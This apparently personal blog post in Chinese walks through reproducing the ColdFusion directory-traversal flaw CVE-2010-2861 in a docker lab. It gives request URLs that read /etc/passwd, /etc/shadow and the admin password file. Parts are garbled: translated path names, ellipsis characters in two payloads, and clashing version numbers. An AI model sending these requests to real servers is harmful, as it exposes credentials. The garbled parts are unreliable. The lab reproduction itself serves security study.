Adobe ColdFusion文件读取漏洞(CVE-2010-2861)

0x01漏洞概述

        Adobe ColdFusion是由J. J. Allaire于1995年创建的商业快速Web应用程序开发计算平台。

        Adobe ColdFusion 9.0.1 及更早版本中存在一个目录遍历漏洞,允许远程攻击者通过区域设置参数读取任意文件,以

(1) CFIDE/administrator/settings/mappings.cfm

(2) 日志记录/设置.cfm

(3) 数据源/索引.cfm

(4) j2eepackaging/editarchive.cfm

(5) 在 CFIDE/administrator/ 中输入.cfm

0x02影响版本

Adobe CouldFusion 8.0.1版本

0x03漏洞复现

(1)打开靶场环境

docker-compose up -d

漏洞环境比较大,建议在网络好的情况下打开。

(2) 访问漏洞

        环境启动以后访问一下路径,然后输入admin:

http://IP地址:8500/CFIDE/administrator/

 成功访问

 (3)读取文件/etc/passwd

访问该路径:

http://IP地址:8500/CFIDE/administrator/enter.cfm?locale=%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/etc/passwd%00en

利用burp进行抓包:

发送到重发器,删除cookie值后可以读取文件/etc/passwd

成功读取文件/etc/passwd。

(4)读取文件/etc/shadow

 修改请求包,然后读取文件/etc/shadow。

访问路径如下:

/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/shadow%00en

(5) 读取后台管理员密码

访问路径如下:

/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en

成功读取后台管理员密码。 

 (6)关闭靶场环境

docker-compose down

posted @ 2022-05-15 11:59  RichardYg  阅读(299)  评论(0编辑  收藏  举报